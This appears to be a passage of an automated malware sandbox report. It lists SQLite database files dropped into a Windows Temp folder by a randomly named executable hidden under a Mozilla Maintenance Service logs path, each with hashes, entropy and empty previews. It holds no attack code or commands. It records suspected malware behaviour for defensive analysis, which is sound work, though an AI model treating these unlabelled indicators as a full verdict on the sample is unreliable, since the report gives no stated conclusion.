                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Mrj7TBNi3S

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\N01rxqMvY9

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\NAnSokyMHL

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\NJ1wafmKxZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\NeN0uJuDQc

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Nv3f6FfR9F

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\O8mbqjNqSe

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\OfEipcGWlu

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\OqunYxSARO

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Os3095xnAw

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Os7GcumcWp

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\P5OxtFzLVz

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\PQay6onHRJ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\PguEmYukX2

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Pt1yP1wcTK

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\PuxJ42XI41

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Q9sNAKkP1l

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QIeyTCLh3X

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\QTfAcuuc0c

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Qeqxf84bhk

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\R4T8qHCPRp

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\RKRaxDZqxU

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
